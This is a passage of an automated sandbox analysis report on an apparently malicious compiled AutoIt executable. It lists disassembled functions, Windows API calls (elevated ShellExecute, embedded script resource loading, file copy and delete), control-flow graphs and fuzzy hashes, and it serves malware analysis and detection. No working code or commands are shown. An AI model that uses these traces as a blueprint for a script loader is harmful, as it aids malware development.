                                            • Part of subcall function 00E00A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DF3C26,00EB62F8,?,?,?), ref: 00E00ACE
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DF3C81
                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00EA93F0,00000010), ref: 00E2D4BC
                                          • SetCurrentDirectoryW.KERNEL32(?,00EB62F8,?,?,?), ref: 00E2D4F4
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EA5D40,00EB62F8,?,?,?), ref: 00E2D57A
                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E2D581
                                            • Part of subcall function 00DF3A58: GetSysColorBrush.USER32(0000000F), ref: 00DF3A62
                                            • Part of subcall function 00DF3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00DF3A71
                                            • Part of subcall function 00DF3A58: LoadIconW.USER32(00000063), ref: 00DF3A88
                                            • Part of subcall function 00DF3A58: LoadIconW.USER32(000000A4), ref: 00DF3A9A
                                            • Part of subcall function 00DF3A58: LoadIconW.USER32(000000A2), ref: 00DF3AAC
                                            • Part of subcall function 00DF3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DF3AD2
                                            • Part of subcall function 00DF3A58: RegisterClassExW.USER32(?), ref: 00DF3B28
                                            • Part of subcall function 00DF39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DF3A15
                                            • Part of subcall function 00DF39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DF3A36
                                            • Part of subcall function 00DF39E7: ShowWindow.USER32(00000000,?,?), ref: 00DF3A4A
                                            • Part of subcall function 00DF39E7: ShowWindow.USER32(00000000,?,?), ref: 00DF3A53
                                            • Part of subcall function 00DF43DB: _memset.LIBCMT ref: 00DF4401
                                            • Part of subcall function 00DF43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DF44A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                          • String ID: This is a third-party compiled AutoIt script.$runas$%
                                          • API String ID: 529118366-3343222573
                                          • Opcode ID: d68447309c913389c57e5c9729b0de24e98262b80822ccccbf8ee58c201c7d2a
                                          • Instruction ID: 0cee6cac7c26cb722f60352239334b2e35d39323c22794460cadcbd4230fc79c
                                          • Opcode Fuzzy Hash: d68447309c913389c57e5c9729b0de24e98262b80822ccccbf8ee58c201c7d2a
                                          • Instruction Fuzzy Hash: 9151143090824CAEDF11EBB5EC06AFE7B78EF45300B068165F655B61A2CA749A49CB31
                                          Function 00DF4AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1137 df4afe-df4b5e call df77c7 GetVersionExW call df7d2c 1142 df4c69-df4c6b 1137->1142 1143 df4b64 1137->1143 1144 e2db90-e2db9c 1142->1144 1145 df4b67-df4b6c 1143->1145 1146 e2db9d-e2dba1 1144->1146 1147 df4b72 1145->1147 1148 df4c70-df4c71 1145->1148 1150 e2dba3 1146->1150 1151 e2dba4-e2dbb0 1146->1151 1149 df4b73-df4baa call df7e8c call df7886 1147->1149 1148->1149 1159 e2dc8d-e2dc90 1149->1159 1160 df4bb0-df4bb1 1149->1160 1150->1151 1151->1146 1153 e2dbb2-e2dbb7 1151->1153 1153->1145 1155 e2dbbd-e2dbc4 1153->1155 1155->1144 1157 e2dbc6 1155->1157 1161 e2dbcb-e2dbce 1157->1161 1162 e2dc92 1159->1162 1163 e2dca9-e2dcad 1159->1163 1160->1161 1164 df4bb7-df4bc2 1160->1164 1165 e2dbd4-e2dbf2 1161->1165 1166 df4bf1-df4c08 GetCurrentProcess IsWow64Process 1161->1166 1167 e2dc95 1162->1167 1171 e2dc98-e2dca1 1163->1171 1172 e2dcaf-e2dcb8 1163->1172 1168 e2dc13-e2dc19 1164->1168 1169 df4bc8-df4bca 1164->1169 1165->1166 1170 e2dbf8-e2dbfe 1165->1170 1173 df4c0d-df4c1e 1166->1173 1174 df4c0a 1166->1174 1167->1171 1179 e2dc23-e2dc29 1168->1179 1180 e2dc1b-e2dc1e 1168->1180 1175 e2dc2e-e2dc3a 1169->1175 1176 df4bd0-df4bd3 1169->1176 1177 e2dc00-e2dc03 1170->1177 1178 e2dc08-e2dc0e 1170->1178 1171->1163 1172->1167 1181 e2dcba-e2dcbd 1172->1181 1182 df4c89-df4c93 GetSystemInfo 1173->1182 1183 df4c20-df4c30 call df4c95 1173->1183 1174->1173 1187 e2dc44-e2dc4a 1175->1187 1188 e2dc3c-e2dc3f 1175->1188 1184 df4bd9-df4be8 1176->1184 1185 e2dc5a-e2dc5d 1176->1185 1177->1166 1178->1166 1179->1166 1180->1166 1181->1171 1186 df4c56-df4c66 1182->1186 1194 df4c7d-df4c87 GetSystemInfo 1183->1194 1195 df4c32-df4c3f call df4c95 1183->1195 1190 df4bee 1184->1190 1191 e2dc4f-e2dc55 1184->1191 1185->1166 1193 e2dc63-e2dc78 1185->1193 1187->1166 1188->1166 1190->1166 1191->1166 1196 e2dc82-e2dc88 1193->1196 1197 e2dc7a-e2dc7d 1193->1197 1198 df4c47-df4c4b 1194->1198 1202 df4c76-df4c7b 1195->1202 1203 df4c41-df4c45 GetNativeSystemInfo 1195->1203 1196->1166 1197->1166 1198->1186 1200 df4c4d-df4c50 FreeLibrary 1198->1200 1200->1186 1202->1203 1203->1198
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 00DF4B2B
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          • GetCurrentProcess.KERNEL32(?,00E7FAEC,00000000,00000000,?), ref: 00DF4BF8
                                          • IsWow64Process.KERNEL32(00000000), ref: 00DF4BFF
                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00DF4C45
                                          • FreeLibrary.KERNEL32(00000000), ref: 00DF4C50
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00DF4C81
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00DF4C8D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                          • String ID:
                                          • API String ID: 1986165174-0
                                          • Opcode ID: fba8688f37c2465e4ce838f06243501456e4f1321fa12a4a3cad70f5bf4d01e9
                                          • Instruction ID: db1bccb7f51c17ff5cd911aeda7ae910d4b28c6e3149314c5e6aa5a12b093a7e
                                          • Opcode Fuzzy Hash: fba8688f37c2465e4ce838f06243501456e4f1321fa12a4a3cad70f5bf4d01e9
                                          • Instruction Fuzzy Hash: 7291C53154E7C8DEC731CB6894611BBFFE4AF25310B499D9ED1CB93A42D220E948C729
                                          Function 00E4DA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1204 e4da5d-e4daab call e4dc20 1207 e4dab1-e4dacd CoCreateInstance 1204->1207 1208 e4db9d-e4dba5 1204->1208 1209 e4daee-e4daf3 1207->1209 1210 e4dacf-e4dadc call e4dcc1 1207->1210 1211 e4db96 1209->1211 1212 e4daf9-e4db16 SetErrorMode GetProcAddress 1209->1212 1210->1208 1217 e4dae2-e4dae9 1210->1217 1211->1208 1215 e4db86 1212->1215 1216 e4db18-e4db21 call e4dd22 1212->1216 1219 e4db8d-e4db94 SetErrorMode 1215->1219 1216->1219 1221 e4db23-e4db38 1216->1221 1217->1208 1219->1208 1223 e4db7d-e4db84 1221->1223 1224 e4db3a-e4db3f 1221->1224 1223->1219 1224->1223 1225 e4db41-e4db53 1224->1225 1227 e4db65-e4db69 1225->1227 1228 e4db55-e4db59 1225->1228 1229 e4db72-e4db7b 1227->1229 1230 e4db6b 1227->1230 1228->1227 1231 e4db5b-e4db60 call e4dcc1 1228->1231 1229->1219 1230->1229 1231->1227
                                          APIs
                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E4DAC5
                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E4DAFB
                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E4DB0C
                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E4DB8E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: ,,$DllGetClassObject
                                          • API String ID: 753597075-2867008933
                                          • Opcode ID: aee727456d249ea8c336348e3ab238131e4ef9fcecf4029827d6e91c12306d71
                                          • Instruction ID: 2ccad1c47b9e91d7074f0442bd2e620acc03468ae4ccb4e0d2fc11ea4fc55a92
                                          • Opcode Fuzzy Hash: aee727456d249ea8c336348e3ab238131e4ef9fcecf4029827d6e91c12306d71
                                          • Instruction Fuzzy Hash: FD417EB1604208EFDB15CF55DC84A9ABBA9EF48310F1590AAED09AF206D7B1DD44CBA0
                                          Function 00DF4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1234 df4fe9-df5001 CreateStreamOnHGlobal 1235 df5003-df501a FindResourceExW 1234->1235 1236 df5021-df5026 1234->1236 1237 e2dd5c-e2dd6b LoadResource 1235->1237 1238 df5020 1235->1238 1237->1238 1239 e2dd71-e2dd7f SizeofResource 1237->1239 1238->1236 1239->1238 1240 e2dd85-e2dd90 LockResource 1239->1240 1240->1238 1241 e2dd96-e2dd9e 1240->1241 1242 e2dda2-e2ddb4 1241->1242 1242->1238
                                          APIs
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00DF4EEE,?,?,00000000,00000000), ref: 00DF4FF9
                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DF4EEE,?,?,00000000,00000000), ref: 00DF5010
                                          • LoadResource.KERNEL32(?,00000000,?,?,00DF4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DF4F8F), ref: 00E2DD60
                                          • SizeofResource.KERNEL32(?,00000000,?,?,00DF4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DF4F8F), ref: 00E2DD75
                                          • LockResource.KERNEL32(00DF4EEE,?,?,00DF4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DF4F8F,00000000), ref: 00E2DD88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: 99e1ebe2d7a7e9b5842e5fb0bbc11ac6fde5faf16d23072ba8d426f5cc2800f9
                                          • Instruction ID: 6d7245792d74fa947995c5ac8f692fb757e9844dfd1a56449d48a2c4bf049dc5
                                          • Opcode Fuzzy Hash: 99e1ebe2d7a7e9b5842e5fb0bbc11ac6fde5faf16d23072ba8d426f5cc2800f9
                                          • Instruction Fuzzy Hash: 45115E75200704AFD7218B66EC58F677BB9EBC9B12F248168FA09D6260DF61EC448670
                                          Function 00DFFE40 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: pr$%
                                          • API String ID: 3964851224-1730865138
                                          • Opcode ID: 47cfdda7eee021bcb7f9e4fc9746ec9cbf16b5811f65fbfd584f83d8684eed42
                                          • Instruction ID: 3e8f79881e67296101e0a8533609f7760a65894441090bfa7f72b00f964d2844
                                          • Opcode Fuzzy Hash: 47cfdda7eee021bcb7f9e4fc9746ec9cbf16b5811f65fbfd584f83d8684eed42
                                          • Instruction Fuzzy Hash: 2C925B706083418FD724DF14C484B6ABBE1FF88304F19996DE98AAB391D775EC85CB92
                                          Function 00DFE800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Dt$Dt$Dt$Dt$Variable must be of type 'Object'.
                                          • API String ID: 0-3952547859
                                          • Opcode ID: e3713f666d2943771ae0db02d5acbcf706316aadb939e888e0f32d647f8ad727
                                          • Instruction ID: 1735e653afcda8c3818ff6d7ecd242a33185cd44a4f74186b1754142071b5442
                                          • Opcode Fuzzy Hash: e3713f666d2943771ae0db02d5acbcf706316aadb939e888e0f32d647f8ad727
                                          • Instruction Fuzzy Hash: 45A26D75A04209CFCB14CF58C480ABAB7B1FF48304F2AC169EA56AB361D775ED45CBA1
                                          Function 00E54696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00E2E7C1), ref: 00E546A6
                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00E546B7
                                          • FindClose.KERNEL32(00000000), ref: 00E546C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirst
                                          • String ID:
                                          • API String ID: 48322524-0
                                          • Opcode ID: c94fc09f09bb4c27afa833d3fa5af518f73f80a210495798f5413f8caecbc24b
                                          • Instruction ID: 01d30e8fe5aff4435c3c31ca21d27ef6f0ba9b9585efe005e5388a3f8bcb5b16
                                          • Opcode Fuzzy Hash: c94fc09f09bb4c27afa833d3fa5af518f73f80a210495798f5413f8caecbc24b
                                          • Instruction Fuzzy Hash: F7E0D8714144006F4210A738EC4D8EA775C9F0633AF100B15FD39E20F0E7F059D88695
                                          Function 00E00B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E00BBB
                                          • timeGetTime.WINMM ref: 00E00E76
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E00FB3
                                          • TranslateMessage.USER32(?), ref: 00E00FC7
                                          • DispatchMessageW.USER32(?), ref: 00E00FD5
                                          • Sleep.KERNEL32(0000000A), ref: 00E00FDF
                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00E0105A
                                          • DestroyWindow.USER32 ref: 00E01066
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E01080
                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00E352AD
                                          • TranslateMessage.USER32(?), ref: 00E3608A
                                          • DispatchMessageW.USER32(?), ref: 00E36098
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E360AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr$pr$pr$pr
                                          • API String ID: 4003667617-1825247661
                                          • Opcode ID: 4e83de12c02549a9ef6360133dc406b714755b6497f71706ed4dab7c8b595f26
                                          • Instruction ID: b54ea38d008363387ce047a5feb92998066b9cf281a5258e95fdea86079c3d3c
                                          • Opcode Fuzzy Hash: 4e83de12c02549a9ef6360133dc406b714755b6497f71706ed4dab7c8b595f26
                                          • Instruction Fuzzy Hash: 36B2C471608741DFD728DF24C888BAABBE5FF84308F14591DE599A7391CB70E884CB92
                                          Function 00E593DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00E591E9: __time64.LIBCMT ref: 00E591F3
                                            • Part of subcall function 00DF5045: _fseek.LIBCMT ref: 00DF505D
                                          • __wsplitpath.LIBCMT ref: 00E594BE
                                            • Part of subcall function 00E1432E: __wsplitpath_helper.LIBCMT ref: 00E1436E
                                          • _wcscpy.LIBCMT ref: 00E594D1
                                          • _wcscat.LIBCMT ref: 00E594E4
                                          • __wsplitpath.LIBCMT ref: 00E59509
                                          • _wcscat.LIBCMT ref: 00E5951F
                                          • _wcscat.LIBCMT ref: 00E59532
                                            • Part of subcall function 00E5922F: _memmove.LIBCMT ref: 00E59268
                                            • Part of subcall function 00E5922F: _memmove.LIBCMT ref: 00E59277
                                          • _wcscmp.LIBCMT ref: 00E59479
                                            • Part of subcall function 00E599BE: _wcscmp.LIBCMT ref: 00E59AAE
                                            • Part of subcall function 00E599BE: _wcscmp.LIBCMT ref: 00E59AC1
                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E596DC
                                          • _wcsncpy.LIBCMT ref: 00E5974F
                                          • DeleteFileW.KERNEL32(?,?), ref: 00E59785
                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E5979B
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E597AC
                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E597BE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                          • String ID:
                                          • API String ID: 1500180987-0
                                          • Opcode ID: bf40a66aa52d0b290a5ccdd42fc967149602fa62206a1a17f6d4d1cb9872babb
                                          • Instruction ID: 4c1b051a79e01075783f363b29a66e0ca4774c176cd7ce8103434693a81df73d
                                          • Opcode Fuzzy Hash: bf40a66aa52d0b290a5ccdd42fc967149602fa62206a1a17f6d4d1cb9872babb
                                          • Instruction Fuzzy Hash: 1FC13CB1900219AEDF11DF95CC85EDEB7BDEF49300F0054AAF609F6152EB709A888F65
                                          Function 00DF3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DF3074
                                          • RegisterClassExW.USER32(00000030), ref: 00DF309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DF30AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 00DF30CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DF30DC
                                          • LoadIconW.USER32(000000A9), ref: 00DF30F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DF3101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 278d9be07f36fc01abbf2d48195c802c6959621782ee24325b41bdff9c8765e3
                                          • Instruction ID: ffa318119743dbc40c21a4d5835a266dcc4353b6588ed9b76d458e4f1553b04c
                                          • Opcode Fuzzy Hash: 278d9be07f36fc01abbf2d48195c802c6959621782ee24325b41bdff9c8765e3
                                          • Instruction Fuzzy Hash: E2313871845309EFDB01CFA5EC85ADABBF4FB09310F10862AE554B62A0D3B90589CF90
                                          Function 00DF3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DF3074
                                          • RegisterClassExW.USER32(00000030), ref: 00DF309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DF30AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 00DF30CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DF30DC
                                          • LoadIconW.USER32(000000A9), ref: 00DF30F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DF3101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
